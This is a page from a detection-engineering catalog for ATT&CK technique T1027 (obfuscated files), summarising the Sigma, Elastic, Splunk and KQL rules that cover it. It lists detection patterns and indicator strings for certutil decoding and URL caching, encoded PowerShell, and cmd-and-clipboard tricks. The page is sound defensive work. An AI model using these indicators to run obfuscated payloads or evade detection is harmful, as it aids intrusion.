detection.wiki

ATT&CK coverage › Technique

Obfuscated Files or Information T1027

Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.

Events covered

12 catalog events are tagged with this technique by at least one rule.

ProviderEvent IDTitle
Sysmon1Process creation
Sysmon5Process terminated
Sysmon11FileCreate
Security-Auditing4688A new process has been created.
Security-Auditing4689A process has exited.
Security-Auditing4697A service was installed in the system.
Security-Auditing5379Credential Manager credentials were read.
Defender-DeviceEvents9007000Defender event (any)
Defender-DeviceProcessEvents9001000Process activity (any)
PowerShell4103Payload Context: ContextInfo User Data: UserData.
PowerShell4104Creating Scriptblock text (MessageNumber of MessageTotal).
Service-Control-Manager7045A service was installed in the system.

Authoring guide

Patterns shared across the 106 rules above: which fields they filter on, what specific values they look for, and what they exclude. Field names are normalized across vendors so Sigma's Image, Elastic's process.name, and Splunk's process_name collapse into one row. Each rule contributes at most once per row.

Fields filtered most (32 distinct)

The fields most rules look at when detecting this technique. The How column shows the operators authors use (eq, wildcard, regex_match, match) and how often each appears. Sample values are concrete examples to start from, not an exhaustive list.

FieldRulesHowSample values
CommandLine38match 28, regex_match 8, contains 3, is_not_null 2, in 1, eq 1TVqQAAMAAAAEAAA, -f, URL , certutil, base64 --decode
Image20ends_with 20, match 1\certutil.exe, \powershell.exe, \pwsh.exe, \ping.exe, \cscript.exe
ScriptBlockText17match 9, regex_match 7, eq 2, ends_with 1shellexec_rundll, +, `, {0}, cmd.{0,5}(?:/c|/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\...
OriginalFileName17eq 17CertUtil.exe, PowerShell.EXE, pwsh.dll, wscript.exe, Cmd.EXE
Payload11regex_match 7, match 4, ends_with 1shellexec_rundll, cmd.{0,5}(?:/c|/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\..., system.io.compression.deflatestream, readtoend, system.io.streamreader
ServiceFileName11match 10, regex_match 1cmd, &&, shellexec_rundll, -f, clipboard]::
ImagePath11match 10, regex_match 1cmd, &&, shellexec_rundll, -f, clipboard]::
Esql.script_block_pattern_count10ge 101, 2, 20, 5
Provider_Name10eq 10Service Control Manager
Esql.script_block_length8gt 8500, 1000
file.directory4is_null 4
EventID4eq 44688, 4104, 11
TargetFilename4ends_with 2, eq 2\Windows\Temp\tmp.bat, \gthread-3.6.dll, \sigcmm-2.4.dll, Local\Microsoft\WindowsApps\Get-Variable.exe, "*.exe"
TargetName3match 3\Temporary Internet Files\Content.Outlook, Microsoft_Windows_Shell_ZipFolder:filename, order, payment, invoice
Esql.script_block_ratio2gt 1, ge 10.5, 0.75

Top indicator values (569 distinct)

Specific (field, operator, value) combinations the rules check for, ranked by how many rules under this technique use each one. The Corpus reach column counts how many rules across the entire catalog (any technique) check the same combination. High numbers point to widely-used indicators that are likely noisy on their own; combine them with another condition for useful signal. Blank means the combination is specific to rules under this technique.

FieldKindValueRules (here)Corpus reach
Provider_NameeqService Control Manager1043
OriginalFileNameeqCertUtil.exe813
Imageends_with\certutil.exe834
Imageends_with\powershell.exe8143
OriginalFileNameeqPowerShell.EXE864
Imageends_with\pwsh.exe8140
OriginalFileNameeqpwsh.dll872
Esql.script_block_pattern_countge166
Esql.script_block_lengthgt50066
ServiceFileNamematchcmd45
ImagePathmatchcmd45
CommandLinematch-encode33
ServiceFileNamematch&&33
ImagePathmatch&&34
ImagePathmatch/c34
TargetNamematchMicrosoft_Windows_Shell_ZipFolder:filename33
CommandLinematchURL 33
CommandLinematchurlcache 33
CommandLinematchverifyctl 33
Esql.script_block_lengthgt100022

Common exclusions (11 distinct)

Field/operator/value combinations that rules under this technique routinely exclude (top-level not() clauses). These are the false-positive paths the community has learned to filter out. A new rule that ignores the high-count entries here will likely fire on the same noisy paths.

FieldKindValueRules excluding
ScriptBlockTextmatch[System.IO.File]::Open('C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender...1
ScriptBlockTextmatch$([char]0x1b)]6331
ScriptBlockTextmatch:::::\\\\windows\\\\sentinel1
ScriptBlockTextmatch$local:Bypassed1
ScriptBlockTextmatchorigPSExecutionPolicyPreference1
ScriptBlockTextmatch$s.BranchBehindStatusSymbol.Text1
ScriptBlockTextmatchGitBranchStatus1
ScriptBlockTextmatchsentinelbreakpoints1
ScriptBlockTextmatchGENESIS-56541
Imagein"*:\\Windows\\SysWOW64\\*"1
Imagein"*:\\Windows\\System32\\*"1

Rules under this technique

Every rule in the catalog tagged with this technique, grouped by vendor. Click a rule title for its full predicates, exclusions, and indicators.

Sigma 84 rules

Elastic 12 rules

Splunk 4 rules

Kusto Query Language 6 rules